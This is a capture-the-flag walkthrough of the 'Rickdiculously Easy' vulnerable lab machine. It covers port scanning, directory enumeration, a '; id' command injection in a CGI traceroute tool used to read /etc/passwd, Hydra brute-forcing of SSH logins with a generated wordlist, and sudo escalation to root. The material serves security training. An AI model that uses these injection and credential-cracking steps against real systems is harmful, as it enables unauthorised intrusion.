CTF Walkthrough - Rickdiculously Easy


Information

Intro

Rick and Morty is a brutal animated comedy created by Justin Roiland. Its main characters are Rick, a genius scientist, and Morty, his grandson. If you enjoy adult animated series, this one is worth watching.

Rickdiculously Easy is a Rick and Morty themed machine, so we can expect several references to the show. However, Rick and Morty knowledge is not needed to complete this machine. The goal is finding several flags, getting a total of 130 points. Let’s go!

Walkthrough

Identification and Enumeration

As always, the first thing to do is identify the target IP. Luckily it answers to ping requests, so a simple fping will make it:

root@kali:~# fping -aqg 192.168.10.0/24
[...]
192.168.10.113

After some seconds, fping spits a handful of IPs. The only unknown address in that list is 192.168.10.113, which should be my new guest, and my target IP.

Then, nmap is used to get all of the information about the services running in the machine. Show me what you got!

nmap -sT -p- -A -vvv -oA nmap 192.168.10.113
[...]
PORT      STATE SERVICE REASON  VERSION
21/tcp    open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
22/tcp    open  ssh?    syn-ack
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack Apache httpd 2.4.27 ((Fedora))
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack Cockpit web service
|_http-title: Did not follow redirect to https://192.168.10.113:9090/
13337/tcp open  unknown syn-ack
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack OpenSSH 7.5 (protocol 2.0)
60000/tcp open  unknown syn-ack
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...

That’s a lot of info! Let’s go step by step.

Flag 1

Well, if you paid a little attention a second ago, you just saw the first flag… If you connect to TCP port 13337, you receive the first flag. Simple as that:

root@kali:~# nc 192.168.10.113 13337
FLAG:{TheyFoundMyBackDoorMorty}-10Points

Total points: 10

Flag 2

nmap also shows a promising FLAG.txt anonymously readable:

root@kali:~# lftp 192.168.10.113
lftp 192.168.10.113:~> cat FLAG.txt
FLAG{Whoa this is unexpected} - 10 Points

Another flag!

Total points: 20

Flag 3

The next thing that catches my attention is the “Rick’s half baked reverse shell”. When connecting with netcat, we get a very limited shell, able to execute just a few commands:

root@kali:~# nc 192.168.10.113 60000
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
# pwd
/root/blackhole/
# whoami
root

We got the third flag! However, running other basic commands in this shell, such as cd, echo or touch, doesn’t work:

# cd
Permission Denied.
# echo potato
echo potato: command not found
# touch potato
touch potato: command not found

This makes me thing this is not an actual shell, but a limited interactive interpreter. I’ll park this by now…

Total points: 30

Flag 4

I notice a weird thing about port 22. nmap shows a “Welcome to Ubuntu” banner, but the service is not SSH. By connecting directly with netcat, the service just returns the banner and disconnects:

root@kali:~# nc 192.168.10.113 22
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
root@kali:~#

It looks like the machine is trolling us… I decide this service is unusable, and go to the next one.

Port 9090 presents a HTTP+HTTPS (HTTP with redirection to HTTPS on the same port) service, giving us access to the Fedora web administration portal:

Fedora administration

We immediately notice two things: First, we got the 4th flag: FLAG {There is no Zeus, in your face!} - 10 Points. Second, the web portal is “altered”, and it doesn’t have a password field. Well, maybe is a hint, telling us this is not the way to go.

Total points: 40

Flag 5

There are two services left: SSH on port 22222 (accepting password login), and HTTP on port 80. As we don’t have a user/password list to use on SSH, let’s explore HTTP.

Accessing through the web browser, we get to the Morty’s Cool Website:

Morty's Cool Website

It doesn’t seem to have any kind of link or further information, but maybe it has some other files:

root@kali:~# dirb 'http://192.168.10.113'

-----------------
DIRB v2.22
By The Dark Raver
-----------------

[...]

---- Scanning URL: http://192.168.10.113/ ----
+ http://192.168.10.113/cgi-bin/ (CODE:403|SIZE:217)
+ http://192.168.10.113/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://192.168.10.113/passwords/
+ http://192.168.10.113/robots.txt (CODE:200|SIZE:126)

[...]

We found at least 2 interesting resources, /passwords/ and robots.txt. The first path is a listable directory with two files: passwords.html and FLAG.txt. We found our 5th flag: FLAG{Yeah d- just don't do it.} - 10 Points!

Total points: 50

Flag 6

Then, we access /passwords/passwords.html. It seems Morty stored some passwords here, and Rick had to hide them… How do you hide something in a HTML file?

HTML comments

We got a password, winter. We’ll make note of it and find somewhere we can use it.

The other interesting resource found with dirb was robots.txt:

They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*

That root_shell.cgi file looks super interesting… But it’s just another joke of the machine! Maybe we have more luck with tracertool.cgi:

Tracer tool

It seems it’s a tool making use of tracepath or traceroute to give us information about the path followed by the network traffic generated by the machine. If the input from the user is not correctly treated, we may be able to execute code in the machine…

Tracer tool id

Bingo!

What happened here? Well, tracertool.cgi is programmed to get the input from the user (GET parameter ip) and pass it directly to a shell interpreter executing traceroute, like this:

$ traceroute <USER_INPUT>
$ traceroute 127.0.0.1

Everything normal so far. But what if <USER_INPUT> is not an IP address, but something like ; id?

$ traceroute <USER_INPUT>
$ traceroute ; id

We are effectively chaining two commands. traceroute without any parameters will just print the usage string to stderr (that’s why we don’t see any errors on the website, as we only receive stdout), then ; tells the interpreter that the command is over (just like a \n character would), and it starts executing the next command of the line, id. This vulnerability allows code execution on the machine, and we can print the contents of /etc/passwd with the cat command:

Tracer tool cat

It seems that the cat command… Actually prints a cat! That was unexpected ☺ We need to use an alternative:

Tracer tool less

That’s better! We now have three non-system users: RickSanchez, Morty and Summer. We can try to login in the machine with the password we recovered before, winter:

Hydra Summer

Perfect! On Summer’s home directory we find our 6th flag:

[Summer@localhost ~]$ sed '' FLAG.txt
FLAG{Get off the high road Summer!} - 10 Points

Total points: 60

Flag 7

Summer has read access to all of the files stored on other users’ home folders:

[Summer@localhost ~]$ tree /home
/home
├── Morty
│   ├── journal.txt.zip
│   └── Safe_Password.jpg
├── RickSanchez
│   ├── RICKS_SAFE
│   │   └── safe
│   └── ThisDoesntContainAnyFlags
│       └── NotAFlag.txt
└── Summer
    └── FLAG.txt

5 directories, 5 files

That NotAFlag.txt file inside Rick’s home is suspicious… But, as advised, it doesn’t contain any flags! Ignoring the trolling not-a-flag file, we have some other 3 interesting files we download to our machine.

Morty has two files: a password-protected journal zip, and an image of Rick, named Safe_Password.jpg… Maybe the file has something hidden in it:

root@kali:~/boot2root/rickdiculously_easy# strings Safe_Password.jpg | awk '{print length, $0}' | sort -rn
73 8 The Safe Password: File: /home/Morty/journal.txt.zip. Password: Meeseek
45 %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
43 &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
19 0D000D\DDDD\t\\\\\t
11 c';F3RQEY!E
10 b\ZCo2HFbn
10 "$$848`44`
8 S	8<5MTA
[... more garbage ...]

Straightforward! The file is directly telling us that Meeseek is the password for journal.txt.zip. We verify that’s the correct password, and we get our 7th flag: FLAG: {131333} - 20 Points.

Total points: 80

Flag 8

Morty’s journal gives us the hint that the 7th flag we found is something like the password to a Rick’s safe, or something like that. Hey, there was a safe file in Rick’s home directory:

[Summer@localhost ~]$ file /home/RickSanchez/RICKS_SAFE/safe
/home/RickSanchez/RICKS_SAFE/safe: ELF 64-bit LSB executable, x86-64, version 1
(SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for
GNU/Linux 2.6.32, BuildID[sha1]=6788eee358d9e51e369472b52e684b7d6da7f1ce, not
stripped

The safe is an executable file. If we copy it to Summer’s home folder, give execution permissions, and execute it, all we got is… Garbage!

[Summer@localhost ~]$ cp /home/RickSanchez/RICKS_SAFE/safe .
[Summer@localhost ~]$ chmod +x safe
[Summer@localhost ~]$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
[Summer@localhost ~]$ ./safe potato
decrypt: �CG�,�eo%m
                    ��8��u�n���#�+q��(���Dv3+Mܯ����io���6��~뇈~Fm~t1��G�����_^�黢rޥunz����V	TP|���c�(ĭ(���vÓ��!lH���=
                                                   ���4C��c��2���O�C���"�
                                                                         ����5M�v׹�m��PfL���A���X.:Z��3D��3C�;�|�H�L�U�e���&]
�xw�O�t����(                                       Z�.
             RΑ�
y�2�k*o~��O =s	��Q���*muxk����d�lC�P�U WɤF��g�m�J��	@

However, we can see that the garbage output starts with decrypt:. Maybe there’s a string stored in the executable, and it’s waiting for the correct safe password… Morty gave as a hint before:

[Summer@localhost ~]$ ./safe 131333
decrypt: 	FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to
 generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.�	@

We get the 8th flag, and a hint for Rick’s password!

Total points: 100

Flag 9

Using a little Google-fu, we find Rick’s old band name: “The Flesh Curtains”. So we need to generate a dictionary with passwords with this form:

<UP_CHR><DIGIT><The/Flesh/Curtains>

A super simple Python script is enough to generate the dictionary:

import string

words = ['The', 'Flesh', 'Curtains']

for i in string.ascii_uppercase:
    for j in string.digits:
        for k in words:
            print('{0}{1}{2}'.format(i, j, k))

We generate a password dictionary and try to login using user RickSanchez:

Hydra RickSanchez

We got Rick’s password, P7Curtains! There was a reference to sudo in his safe, so probably this user have permissions to use it…

Sudo access

We got root, and the last flag of the machine! FLAG: {Ionic Defibrillator} - 30 points

Total points: 130

Vulnerable machine completed!

Final words

Easy but fun machine, with a lot of references to Rick and Morty, different types of vulnerabilities, and some trolling here and there. If you like the series, this machine is worth a try, even if it’s easier than you are used to.

All done here, have a nice day!